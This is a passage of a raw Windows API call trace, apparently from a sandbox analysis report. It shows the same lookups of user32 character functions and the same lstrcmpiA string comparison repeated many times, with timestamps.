(ch=0x34) returned 1 [0013.224] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.224] IsCharLowerA (ch=69) returned 0 [0013.224] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.224] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.224] IsCharLowerA (ch=70) returned 0 [0013.225] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.225] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.225] IsCharLowerA (ch=71) returned 0 [0013.225] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.225] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.225] IsCharLowerA (ch=72) returned 0 [0013.225] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.225] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.225] IsCharLowerA (ch=73) returned 0 [0013.225] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.225] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.225] IsCharLowerA (ch=74) returned 0 [0013.225] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.225] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.225] IsCharLowerA (ch=75) returned 0 [0013.225] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.225] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.225] IsCharLowerA (ch=76) returned 0 [0013.225] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.225] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.225] IsCharLowerA (ch=77) returned 0 [0013.225] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.225] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.225] IsCharLowerA (ch=78) returned 0 [0013.225] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.225] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.225] IsCharLowerA (ch=79) returned 0 [0013.225] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.225] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.225] IsCharLowerA (ch=80) returned 0 [0013.225] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.225] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.225] IsCharLowerA (ch=81) returned 0 [0013.225] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.225] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.225] IsCharLowerA (ch=82) returned 0 [0013.225] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.226] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.226] IsCharLowerA (ch=83) returned 0 [0013.226] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.226] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.226] IsCharLowerA (ch=84) returned 0 [0013.226] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.226] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.226] IsCharLowerA (ch=85) returned 0 [0013.226] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.226] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.226] IsCharLowerA (ch=86) returned 0 [0013.226] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.226] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.226] IsCharLowerA (ch=87) returned 0 [0013.226] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.226] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.226] IsCharLowerA (ch=88) returned 0 [0013.226] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.226] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.226] IsCharLowerA (ch=89) returned 0 [0013.226] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.226] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.226] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.226] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.226] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.226] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.226] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.226] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.226] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.227] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.227] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.227] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.227] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.227] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.227] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.227] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.227] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.227] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.227] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.227] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.227] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.227] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.227] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.227] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.227] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.227] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.227] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.227] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.227] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.227] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.228] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.228] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.228] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.228] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.228] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.228] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.228] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.228] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.228] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.228] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.228] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.228] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.228] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.228] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.228] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.228] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.228] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.228] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.228] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.228] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.228] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.228] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.229] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.229] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.229] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.229] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.229] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.229] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.229] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.229] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.229] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.229] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.229] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.229] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.229] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.229] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.229] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.229] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.229] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.229] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.229] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.229] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.229] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.229] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.230] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.230] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.230] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.230] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.230] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.230] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.230] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.230] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.230] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.230] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.230] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.230] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.230] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.230] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.230] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.230] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.230] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.230] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.230] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.230] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.230] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.231] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.231] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.231] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.231] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.231] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.231] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.231] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.231] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.231] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.231] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.231] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.231] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.231] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.231] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.231] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.231] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.231] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.231] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.231] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.231] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.231] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.232] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.232] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.232] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.232] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.232] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.232] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.232] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.232] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.232] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.232] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.232] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.232] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.232] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.232] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.232] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.232] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.232] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.232] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.232] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.232] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.232] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.233] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.233] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.233] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.233] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.233] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.233] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.233] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.233] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.233] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.233] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.233] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.233] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.233] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.233] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.233] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.233] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.233] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.233] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.233] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.233] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.233] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.233] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.234] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.234] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.234] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.234] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.234] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.234] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.234] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.234] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.234] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.234] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.234] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.234] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.234] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.234] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.234] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.234] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.234] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.234] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.234] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.234] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.235] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.235] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.235] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.235] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.235] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.235] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.235] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.235] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.235] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.235] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.235] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.235] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.235] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.235] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.235] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.235] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.235] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.236] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.236] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.236] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.236] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.236] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.236] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.236] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.236] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.236] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.236] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.236] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.236] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.236] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.236] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.236] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.236] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.236] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.236] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.236] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.236] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.236] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.237] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.237] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.237] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.237] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.237] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.237] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.237] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.237] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.237] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.237] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.237] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.237] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.237] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.237] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.237] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.237] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.237] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.237] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.237] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.237] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.237] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.237] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.238] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.238] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.238] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.238] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.238] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.238] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.238] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.238] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.238] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.238] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.238] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.238] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.238] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.238] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.238] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.238] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.238] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.238] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.238] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.238] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.238] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.239] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.239] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.239] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.239] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.239] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.239] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.239] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.239] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.239] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.239] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.239] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.239] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.239] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.239] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.239] GetProcAddress (hModule=0x75120000, 